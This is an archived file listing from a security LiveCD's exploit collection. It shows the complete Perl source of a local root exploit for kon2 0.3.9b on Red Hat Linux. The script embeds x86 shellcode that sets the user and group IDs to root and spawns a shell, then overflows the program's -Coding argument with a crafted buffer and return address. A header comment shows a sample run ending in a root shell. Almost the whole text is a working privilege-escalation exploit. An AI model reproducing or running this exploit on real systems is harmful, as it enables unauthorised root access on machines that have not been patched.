Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / priv8kon.pl < prev next >

Wrap

Perl Script | 2005-02-12 | 1KB | 44 lines

#!/usr/bin/perl #################################################################################### #Priv8security.com kon2 version 0.3.9b-16 and < local root exploit. # # Tested on Redhat 8.0. should work on 9.0 and 7.3 # Bug happens on -Coding arg. # Based on Redhat Advisory. # # [wsxz@localhost buffer]$ perl priv8kon.pl # -=[ Priv8security.com kon local root exploit ]=- # usage: priv8kon.pl offset # [+] Using ret shellcode 0xbfffffc6 # Kanji ON Console ver.0.3.9 (2000/04/09) # # KON> video type 'VGA' selected # KON> hardware scroll mode. # sh-2.05b# id # uid=0(root) gid=0(root) groups=500(wsxz) #################################################################################### $shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0 "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0 "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69". "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; $path = "/usr/bin/kon"; $ret = 0xbffffffa - length($shellcode) - length($path); $offset = $ARGV[0]; print "-=[ Priv8security.com kon2 local root exploit ]=-\n"; print "usage: $0 offset\n"; printf("[+] Using ret shellcode 0x%x\n",$ret + $offset); $new_retword = pack('l', ($ret + $offset)); $buffer2 = "A" x 796; $buffer2 .= $new_retword; $buffer = $shellcode; local($ENV{'WSXZ'}) = $buffer; exec("$path -Coding $buffer2");